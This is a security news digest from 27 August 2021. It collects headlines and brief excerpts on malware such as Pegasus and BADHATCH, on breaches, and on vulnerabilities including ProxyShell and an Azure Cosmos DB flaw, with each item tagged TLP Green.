InfoSec News 20210827
Top News
-
Mobile Security companies are lining up for protection against Pegasus Malware
"As the Pegasus malware nuisance is slowly found politically gripping the entire world, companies offering security solutions to mobile users are getting busy in finding out a solution that helps protect against the infection repercussions caused by the Pegasus Malware."
TLP1 : Green
-
ULA email leak: internal emails allege smear campaign against SpaceX and Elon Musk
"Six internal emails, allegedly involving correspondence between a union lobbyist and a senior official of American spacecraft launch service provider United Launch Alliance (ULA), have been leaked on a popular hacker forum."
TLP1 : Green
-
Preparing for a RDDoS extortion attack
"Ransom attacks dominate cybercrime headlines. May’s Colonial Pipeline attack reduced US east coast fuel supply by 45 percent, resolved only by a $4.4 million ransom payment. In the weeks that followed, President Joe Biden even went as far as calling on Vladimir Putin to move against ransomware groups operating from Russia."
TLP1 : Green
Cybersecurity State: Surveillance, Cyberwarfare, Cybercriminality and Hacktivism
-
New surveillance law to combat crime on the 'dark web' has civil liberties groups worried
"The federal government has passed legislation which will grant top law enforcement agencies new and intrusive powers to to combat cyber crime on the dark web, but the new law has some groups worried about the extent of the capabilities it unleashes."
TLP1 : Green
-
FIN8 APT Hackers Attacks Financial Institutions Using Sophisticated Backdoor
"The security analysts from the cybersecurity firm Bitdefender have recently noted the new backdoor BADHATCH malware that was being used by the very well-known threat actor, FIN8."
TLP1 : Green
Breaches: Data Breaches and Hacks
-
Breach at Deep South allergy clinic group exposed the health info of estimated 9,800 patients
"Atlanta Allergy & Asthma (AAA), the largest allergy treatment healthcare business in the region, is notifying 9,800 patients that a January data breach involved protected health information."
TLP1 : Green
-
Critical Cosmos Database Flaw Affected Thousands of Microsoft Azure Customers
"Cloud infrastructure security company Wiz on Thursday revealed details of a now-fixed Azure Cosmos database vulnerability that could have been potentially exploited to grant any Azure user full admin access to other customers' database instances without any authorization."
TLP1 : Green
Vulnerabilities: Vulnerability Advisories, Zero-Days,Patches and Exploits
-
Big bad decryption bug in OpenSSL – but no cause for alarm
"The well-known and widely-used encryption library OpenSSL released a security patch earlier this week.
Annoyingly for those who like lean, modern, sans serif typefaces, the new version is OpenSSL 1.1.1l, which is tricky to interpret if you use a font in which upper case EYE, lower case ELL and the digit ONE look at all similar."
TLP1 : Green
-
New variant of PRISM Backdoor ‘WaterDrop’ targets Linux systems
"According to researchers, the PRISM backdoor has been on their radar for more than 3.5 years.
Security researchers at AT&T Labs have published a report sharing details of a newly discovered Linux ELF executables cluster having zero to low antivirus detections on VirusTotal."
TLP1 : Green
-
Cisco Patches Serious Vulnerabilities in Data Center Products
"Cisco this week announced the release of patches for a critical vulnerability affecting its Application Policy Infrastructure Controller (APIC) and Cloud APIC products."
TLP1 : Green
-
Follow up: Microsoft Issues Guidance on ProxyShell Vulnerabilities
"Microsoft on Wednesday warned Exchange customers that their deployments are exposed to attacks exploiting the ProxyShell vulnerabilities, unless the adequate patches have been installed."
TLP1 : Green
Incident Response: Infrastructure, Training, SIEM and Incident Handling
-
Beyond the XDR Hype – A Look at the Forrester New Tech on Extended Detection and Response
"Driven by the need for richer threat context, the Extended Detection and Response (XDR) solutions category is gaining a lot of “market buzz” so far in 2021. In recent months, the industry analyst community has accelerated its research efforts in this area to help guide the market towards a common understanding of XDR."
TLP1 : Green
-
Engineering Workstations Are Concerning Initial Access Vector in OT Attacks
"Organizations that use industrial control systems (ICS) and other operational technology (OT) are increasingly concerned about cyber threats, and while they have taken steps to address risks, many don’t know if they have suffered a breach, according to a survey conducted by the SANS Institute on behalf of industrial cybersecurity firm Nozomi Networks."
TLP1 : Green
Technical Articles: Forensics, Reverse Engineering, Malware, Phishing, Pentesting, Software Security and Cryptography
-
BeaconEye - Hunts Out CobaltStrike Beacons And Logs Operator Command Output
"BeaconEye scans running processes for active CobaltStrike beacons. When processes are found to be running beacon, BeaconEye will monitor each process for C2 activity."
TLP1 : Green
-
Fraude personificando a marca Continente espalha-se através do WhatsApp: Não se deixe enganar!
"Uma nova campanha fraudulenta personificando a marca Continente está a ser disseminada em Portugal poucos dias antes do final do mês de agosto de 2021. Os malfeitores utilizam uma landing page totalmente responsiva a dispositivos móveis com uma mensagem referente à comemoração dos 40º aniversário da marca Continente."
TLP1 : Green
-
How Threat Detection is Evolving
"As adversaries have shifted the focus of attacks to achieve their goals, defenders must evolve their approach to threat detection.
The threat landscape is dynamic and ever changing. Adversaries are evolving their approaches and targets."
TLP1 : Green
-
MSSQL for Pentester: Command Execution with Ole Automation
"OLE automation is a process through which an application can access and manipulate the implied objects in other applications. Hence, in this article, we will how to use OLE automation to our benefit."
TLP1 : Green
1Traffic Light Protocol (TLP) [1] for information sharing:
- Red:Not for disclosure, restricted to participants only.
- Amber: Limited disclosure, restricted to participants organizations.
- Green: Limited disclosure, restricted to the community.